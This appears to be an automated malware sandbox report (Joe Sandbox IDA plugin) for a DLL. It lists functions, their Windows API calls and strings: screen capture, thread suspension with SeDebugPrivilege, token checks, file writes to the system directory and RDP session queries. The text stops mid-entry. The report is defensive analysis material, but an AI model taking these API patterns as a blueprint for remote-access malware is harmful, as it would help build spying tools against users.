                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #3811$#2614#860
                                                          • String ID: *.*
                                                          • API String ID: 4293058641-438819550
                                                          • Opcode ID: 9a1bd5b303f82e1101b9f388daf2ff61e48d11c0f8e37bea33aad176008b9ec5
                                                          • Instruction ID: 666ce54a2a265a37b10a0135446347dcc930d7d9a3e7cb816894ca7fb184fd78
                                                          • Opcode Fuzzy Hash: 9a1bd5b303f82e1101b9f388daf2ff61e48d11c0f8e37bea33aad176008b9ec5
                                                          • Instruction Fuzzy Hash: 5D11B3B5404B059FC7A4CFA5D681946BBE5FE886007848A2EA18AC7A24E770F504DF50
                                                          Function 100059D0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 47libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,MultiByteToWideChar,.23,00000000,?,00000000,10005979,?,?), ref: 100059E4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100059ED
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA,?,00000000,10005979,?,?), ref: 100059FB
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100059FE
                                                          • malloc.MSVCRT ref: 10005A1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$malloc
                                                          • String ID: .23$KERNEL32.dll$MultiByteToWideChar$lstrlenA
                                                          • API String ID: 1625907898-566195008
                                                          • Opcode ID: 5775f1e7eb7e2f5d9e18227d5eded49f95364944b1adf940be7b042424f80c18
                                                          • Instruction ID: cce5c33cb54e4e20ebcd19e924e9cf720d43bdeab14a6bb2b58a7cbeabffb214
                                                          • Opcode Fuzzy Hash: 5775f1e7eb7e2f5d9e18227d5eded49f95364944b1adf940be7b042424f80c18
                                                          • Instruction Fuzzy Hash: A5F0C8E25403196BE620ABB48C46E7BB7ECEF85351F05482AF545D3240DA68E8008771
                                                          Function 10018200 Relevance: 15.2, APIs: 10, Instructions: 153sleepwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10018A20: ReleaseDC.USER32(00000000,?), ref: 10018A38
                                                            • Part of subcall function 10018A20: GetDC.USER32(00000000), ref: 10018A40
                                                          • GetCursorPos.USER32(?), ref: 10018246
                                                          • GetSystemMetrics.USER32(00000000), ref: 10018255
                                                          • _ftol.MSVCRT ref: 10018273
                                                          • _ftol.MSVCRT ref: 10018288
                                                          • GetCursorInfo.USER32(?,?,00000008), ref: 100182AE
                                                          • DestroyCursor.USER32(?), ref: 100182D9
                                                          • BitBlt.GDI32(?,00000000,00000000,10016B8A,?,?,00000000,00000000,?), ref: 1001831C
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 10018373
                                                          • Sleep.KERNEL32(00000001), ref: 10018393
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 1001839C
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Cursor$CounterPerformanceQuery_ftol$DestroyInfoMetricsReleaseSleepSystem
                                                          • String ID:
                                                          • API String ID: 2306850792-0
                                                          • Opcode ID: bb3ab1a7d1fb864ae3465332f95efda82989cf761ace87dd28a93c5291d193c7
                                                          • Instruction ID: ed20b3c1f5c79fd808ca28f3e705cb4aa4f98cfa336912cfc5d34cc1cf5afb6b
                                                          • Opcode Fuzzy Hash: bb3ab1a7d1fb864ae3465332f95efda82989cf761ace87dd28a93c5291d193c7
                                                          • Instruction Fuzzy Hash: 43517B75204B019FE324DF29C890B5BB7E5FB88700F544A1DF6A69B290E770FA85CB61
                                                          Function 10018000 Relevance: 15.1, APIs: 10, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReleaseDC.USER32(00000000,?), ref: 10018034
                                                          • DeleteDC.GDI32(?), ref: 10018044
                                                          • DeleteDC.GDI32(?), ref: 1001804A
                                                          • DeleteDC.GDI32(?), ref: 10018050
                                                          • DeleteObject.GDI32(?), ref: 1001805C
                                                          • DeleteObject.GDI32(?), ref: 10018062
                                                          • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 10018083
                                                          • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 10018093
                                                          • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 100180A3
                                                          • DestroyCursor.USER32(?), ref: 100180C9
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$#825$Object$CursorDestroyRelease
                                                          • String ID:
                                                          • API String ID: 719826280-0
                                                          • Opcode ID: 90877511eecfd0b4e7a431cebd02d7416917aa731a6839dde4062e1f4328a9cd
                                                          • Instruction ID: ee9c09a91b7e4212c511851f40033770f7d05fd05274aa2e52ec135f7c4494b2
                                                          • Opcode Fuzzy Hash: 90877511eecfd0b4e7a431cebd02d7416917aa731a6839dde4062e1f4328a9cd
                                                          • Instruction Fuzzy Hash: 8921BFB6600B049BE620DF65CC80B57B3ECFF88610F050A1DE59A97790CB79F9048BA1
                                                          Function 1002C380 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1002BE50: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002BE71
                                                            • Part of subcall function 1002BE50: Process32First.KERNEL32(00000000,00000000), ref: 1002BE8B
                                                            • Part of subcall function 1002BE50: _strcmpi.MSVCRT ref: 1002BEA7
                                                            • Part of subcall function 1002BE50: Process32Next.KERNEL32(00000000,?), ref: 1002BEB6
                                                            • Part of subcall function 1002BE50: CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 1002BEC0
                                                          • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 1002C3E2
                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 1002C3FC
                                                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 1002C422
                                                          • #823.MFC42(?), ref: 1002C42F
                                                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 1002C451
                                                          • #823.MFC42(00000100), ref: 1002C473
                                                          • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000100,?,00000104,?), ref: 1002C4A3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Token$#823InformationOpenProcessProcess32$AccountCloseCreateFirstHandleLookupNextSnapshotToolhelp32_strcmpi
                                                          • String ID: explorer.exe
                                                          • API String ID: 1409679202-3187896405
                                                          • Opcode ID: cdf207af64fab364c8e5cf922331446714e2d043d2f38fccba7b385bc9961bc5
                                                          • Instruction ID: 473375eb415be4f23099c9e5e37f9ddbe1d6da3e806a8c1c49872e14675b6481
                                                          • Opcode Fuzzy Hash: cdf207af64fab364c8e5cf922331446714e2d043d2f38fccba7b385bc9961bc5
                                                          • Instruction Fuzzy Hash: D2412CB6D00228AFDB51EF99EC85FEEBBB8FB48710F10415AF509A3240D6715A40CFA0
                                                          Function 10028620 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: sprintfwsprintf$FileModuleName
                                                          • String ID: %s:%d
                                                          • API String ID: 2407558147-1029262843
                                                          • Opcode ID: d8ece532bf8bfa30307ab5f6c4ca2f51895a1ec57feebc5c8603eadae0ee97b2
                                                          • Instruction ID: 55c58eea656593305c6b8ce4493de1aab1e6244091f29be18d83a82a7fdf8e2b
                                                          • Opcode Fuzzy Hash: d8ece532bf8bfa30307ab5f6c4ca2f51895a1ec57feebc5c8603eadae0ee97b2
                                                          • Instruction Fuzzy Hash: C521F57A4042096FD224C724DC84FEBB3D9EBE4310F45492DFA9893140EBB46A46CB92
                                                          Function 10026C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10026C36
                                                          • lstrcatA.KERNEL32(?,?), ref: 10026C48
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000), ref: 10026C65
                                                          • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 10026C76
                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10026C93
                                                          • CloseHandle.KERNEL32(00000000), ref: 10026C9A
                                                          • LocalFree.KERNEL32(?), ref: 10026CCA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateDirectoryFreeHandleLocalPointerSystemWritelstrcat
                                                          • String ID: p
                                                          • API String ID: 3379061965-2181537457
                                                          • Opcode ID: dff563a2350ad42211304f3934d3364c625aae18de2b9c5e09d3b81c4ae3f541
                                                          • Instruction ID: 60c71b90a0802acaa0e5dbf25da7476a72f7519069fb5f0452f7d82c481299c6
                                                          • Opcode Fuzzy Hash: dff563a2350ad42211304f3934d3364c625aae18de2b9c5e09d3b81c4ae3f541
                                                          • Instruction Fuzzy Hash: 8621DE75244305ABE310DF58CC85FDBB7E8FBC8704F044A1DF68996190D774A608CBA2
                                                          Function 100291D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56threadprocessinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 100290C0: GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                            • Part of subcall function 100290C0: OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 100291FA
                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 1002920B
                                                          • OpenThread.KERNEL32(001F03FF,00000000,?,?,?,00000000,0000001C,00000004,00000000), ref: 10029240
                                                          • SuspendThread.KERNEL32(00000000,?,?,00000000,0000001C,00000004,00000000), ref: 10029245
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,0000001C,00000004,00000000), ref: 10029248
                                                          • Thread32Next.KERNEL32(00000000,?), ref: 10029254
                                                          • CloseHandle.KERNEL32(00000000,00000000,0000001C,00000004,00000000), ref: 10029260
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcessThreadThread32$CreateCurrentFirstNextSnapshotSuspendTokenToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 3882456823-2896544425
                                                          • Opcode ID: 21207cfc81d0fa30fd38e5c79fccdacdf40486e218a730a008db783386ba6bf6
                                                          • Instruction ID: 0dba8d27cde3c0ec8bc65889917dbe9669003c362c892a02e3719d3f6e3c27b7
                                                          • Opcode Fuzzy Hash: 21207cfc81d0fa30fd38e5c79fccdacdf40486e218a730a008db783386ba6bf6
                                                          • Instruction Fuzzy Hash: A201A135201314BFE600DB559C81FAFB3E8FFC5650F854919FA4457280E771AD08CBA6
                                                          Function 10024B40 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B60
                                                          • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B80
                                                          • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B94
                                                          • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024BA8
                                                          • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024BBB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeMemory$InformationQuerySession
                                                          • String ID: Console$ICA$RDP
                                                          • API String ID: 2964284127-2419630658
                                                          • Opcode ID: 98709c8a763e5f8c0ce8a9a3b3f6a2cbe279578f64dee6fe19232cbc7fead75c
                                                          • Instruction ID: daa9930ab6a818d1eab33b51c98bebeb05cf46278a298f17033160faa8d90bf6
                                                          • Opcode Fuzzy Hash: 98709c8a763e5f8c0ce8a9a3b3f6a2cbe279578f64dee6fe19232cbc7fead75c
                                                          • Instruction Fuzzy Hash: 4601F5B6618235678504EB5CBC418EBB2E8EB90A55F49442AF984D7200E630ED1CCBF6
                                                          Function 1002ADF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 52registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,?), ref: 1002AE32
                                                          • RegQueryValueExA.ADVAPI32(00000050,Favorites,00000000,00000000,00000000,00000050), ref: 1002AE53
                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AE5E
                                                          • LocalAlloc.KERNEL32(00000040,00002710), ref: 1002AE6B
                                                            • Part of subcall function 1002AB10: lstrcatA.KERNEL32(00000000,?), ref: 1002AB66
                                                            • Part of subcall function 1002AB10: lstrcatA.KERNEL32(00000000,\*.*), ref: 1002AB75
                                                            • Part of subcall function 1002AB10: FindFirstFileA.KERNEL32(00000000,?), ref: 1002AB91
                                                          • LocalReAlloc.KERNEL32(?,00000001,00000042), ref: 1002AEA0
                                                          Strings
                                                          • P, xrefs: 1002AE18
                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 1002AE28
                                                          • Favorites, xrefs: 1002AE4D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocLocallstrcat$CloseFileFindFirstOpenQueryValue
                                                          • String ID: Favorites$P$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                          • API String ID: 3779601296-2418616894
                                                          • Opcode ID: 77a076bccac00a8d07d799b2e314d9b45088ced6a2172ad6612087cac77b1a18
                                                          • Instruction ID: 29b25cf20e73e7ae371a8730182c3eca3561f8d3cee54ef10f52648635208b5d
                                                          • Opcode Fuzzy Hash: 77a076bccac00a8d07d799b2e314d9b45088ced6a2172ad6612087cac77b1a18
                                                          • Instruction Fuzzy Hash: 6B1191B4204305FFE305DF14CC86F9B7BA5FB88704F504E1DF658A26A1D7B8A4198B62
                                                          Function 10029150 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46threadprocessCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 100290C0: GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                            • Part of subcall function 100290C0: OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 10029177
                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 10029184
                                                          • Thread32Next.KERNEL32(00000000,0000001C), ref: 1002919F
                                                          • OpenThread.KERNEL32(001F03FF,00000000,?,00000004,00000000), ref: 100291B2
                                                          • ResumeThread.KERNEL32(00000000), ref: 100291BB
                                                          • CloseHandle.KERNEL32(00000000), ref: 100291C2
                                                          • CloseHandle.KERNEL32(00000000,00000004,00000000), ref: 100291C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcessThreadThread32$CreateCurrentFirstNextResumeSnapshotTokenToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2312015761-2896544425
                                                          • Opcode ID: 92575825664269da82754a126b87f41c0fa238dd4cdd121b5c861b03491c7cf0
                                                          • Instruction ID: 5baa37ad70a989ad156aa77d6f180d112f87292081aecf7063da644eb0796895
                                                          • Opcode Fuzzy Hash: 92575825664269da82754a126b87f41c0fa238dd4cdd121b5c861b03491c7cf0
                                                          • Instruction Fuzzy Hash: 9501A935244204BFF200EBA99C86FAF77A8FF85B90F844519FA0486281D671AD058BB7
                                                          Function 100151F0 Relevance: 13.7, APIs: 9, Instructions: 212registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
